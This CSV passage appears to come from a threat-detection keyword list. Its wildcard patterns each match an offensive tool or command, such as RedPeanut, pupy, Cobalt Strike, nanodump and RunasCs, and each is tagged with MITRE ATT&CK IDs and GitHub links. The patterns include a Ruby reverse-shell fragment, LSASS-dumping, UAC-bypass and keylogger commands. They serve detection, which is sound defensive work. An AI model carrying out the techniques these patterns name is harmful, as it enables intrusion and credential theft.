TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusKerberoastMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusKlistManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusMonitorManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusMonitorMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusPttManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusPttMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusPurgeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusPurgeMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusRenewManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusRenewMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusS4UManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusS4UMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusTgtDelegManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusTgtDelegMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusTriageManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*ruby CVE-202*-*.rb *","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z" +"*ruby poc-cve-202*-*.rb*","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z" +"*ruby -rsocket *TCPSocket.open(*exec sprintf*/bin/sh -i *","greyware_tool_keyword","ruby","ruby reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*ruby_nntpd_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ruby_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ruby_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Rudrastra-main.zip*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*ruler * abk dump -o *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ruler -k -d * brute --users *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ruler-linux64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-linux86*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-osx64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-win64.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-win86.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*rules/d3ad0ne.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*run * pyshell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run android_cam *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run --bg shell_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run -Executable *.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*run interactive_shell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run keylogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run memory_exec *.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run mouselogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run post/windows/gather/checkvm*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*run post/windows/manage/killfw*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*run post/windows/manage/migrate*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*run pyexec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run shell_exec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run shellcode_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Run the krbscm method for SYSTEM shell*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*run thief:latest*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*run_ppl_dump_exploit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*run_ppl_medic_exploit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*run_server.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*runasadmin uac-cmstplua*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*runasadmin uac-token-duplication*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*RunasCreateProcessAsUserW*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs.exe*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs.exe*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs.zip*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs_net2.exe*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs_net2.exe*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCsMain*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs-master*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*runas-netonly *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 